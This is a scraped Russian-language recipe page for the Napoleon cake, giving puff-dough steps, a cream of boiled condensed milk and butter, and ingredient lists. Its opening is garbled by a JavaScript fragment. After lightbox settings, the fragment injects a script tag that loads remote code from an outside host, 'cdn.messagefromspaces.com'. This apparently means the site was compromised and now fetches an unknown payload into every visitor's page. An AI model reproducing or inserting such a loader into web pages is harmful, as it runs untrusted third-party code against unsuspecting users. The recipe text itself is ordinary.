Торт «Наполеон» , 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Торт «Наполеон»

Не от кого не секрет, что одним из лучших тортов сегодня который можно приготовить дома является торт «Наполеон». Удивительный вкус этого неповторимого десерта издавна нравился всем любителям сладенького и будет справедливо считать торт «Наполеон» главным десертом среди подобных себе. Для приготовления одного из лучших десертов торта «Наполеон» растапливаем маргарин, остудив его перемешиваем с мукой. После следует добавить в получившуюся массу молоко, все перемешать. Далее массу нужно посечь ножом, затем добавить немного уксуса (покропить) и все перемешать. Тесто поделить на равные части, каждую часть раскатать тонким слоем. Коржи выкладывать на противень и выпекать до готовности.

Крем:
Сгущенку нужно сварить прямо в банке, поместив ее в кастрюлю с водой. Ее нужно варить около 1-1,5 ч. Остудив сгущенку открыть банку и поместить содержимое в емкость, добавить в нее сливочное масло комнатной температуры. Все взбить миксером до получения необходимой однородной массы. Получившимся кремом перемазать поочередно коржи, сверху торт «Наполеон» посыпать шоколадом или украсить фруктами.

_________________________________________________________________________________________________________

Ингредиенты для рецепта торта «Наполеон»:

1. мука 3 стакана
2. 1 пачка маргарина
3. 1 ст. ложка уксуса
4. 1 ст. молока

Крем:
1. сгущенное молоко 1 б.
2. масло сливочное 200 гр.

Другие рецепты:

Comments are closed.